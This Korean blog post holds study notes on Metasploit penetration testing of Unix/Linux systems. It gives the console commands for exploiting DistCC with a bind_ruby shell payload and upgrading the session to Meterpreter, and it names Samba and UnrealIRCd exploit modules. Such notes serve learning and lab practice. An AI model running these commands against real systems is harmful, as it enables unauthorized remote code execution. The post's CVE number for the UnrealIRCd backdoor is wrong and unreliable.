칼리\메타스플로잇/칼리리눅스 입문자를 위한 메타스플로잇 중심의 모의침투

9장_유닉스/리눅스 기반의 운영체제 침투

아놀드금자 2021. 1. 25. 16:51
728x90

OSVDB (open sourced vulnerability Database)

오픈소스 소프트웨어를 대상으로 부여하는 취약점 코드

 

 


distcc_exec.rb 모듈을 이용한 침투

 

 

osvbd-13378/ cve-2004-2687 취약점에 기반

osvbd-13378: DistCC에서 발생한 구조적 속성을 악용해 공격자가 원격에서 악성 코드를 실행시킬 수 있음

 

 

DistCC

서버와 클라이언트 기반으로 분산 컴파일 작업을 수행하도록 설계한 소프트웨어

 

 

use exploit/unix/misc/distcc_exec
set payload cmd/unix/bind_ruby
set rhost 주소
exploit

 

unix: 침투를 수행할 운영체제

misc: 운영체제에서 취약점이 드러난 분야

distcc_exec: 해당 취약점이 드러난 분야에서 사용할 모듈

cmd: 침투 이후 획득할 작업환형

unix: 악성코드를 사용할 운영체제

bind_ruby: 루비 언어를 기반으로 침투 이후 공격자와 공격 대상자의 통신 방식

 

 

침투 성공 후 whoami 입력  -> daemon 계정으로 접속 확인 가능

 

>sessions -l 입력시 연결된 정보 확인

 

ctrl + z : 백그라운드 상태로 전환

 

 

use multi/manage/shell_to_meterpreter
set session 1
exploit

 

set session1 이란 첫 번째 연결 ID1을 뜻함

위 명령 입력시 두 번째 연결도 가능

 

 


 

usermap_script.rb 모듈을 이용한 침투

 

 

osvbd-34700/cve-2007-2447 취약점에 기반한 침투 모듈

osvbd-34700: 삼바에서 발생한 구조적 속성을 악용해 공걱자가 원격에서 악성 코드를 실행시킬 수 있음

 

삼바: 폴더와 프린터 공유 등을 구현하기 위해 넷바이오스에 기반한 프로토콜

 

 


 

unreal_ircd_3281_backdoor.rb 모듈을 이용한 침투

 

 

osvbd-65445/cve-2014-2075 취약점에 기반한 침투 모듈

osvbd-65445: UnrealIRCd에 트로이 목마 기반의 악성 코드를 삽입해 공격자가 원격에서 악성코드를 실행시킬 수 있음

 

IRC: 실시간 채팅 프로토콜

UnrealIRC: 오픈 소스 IRC 데몬

 

728x90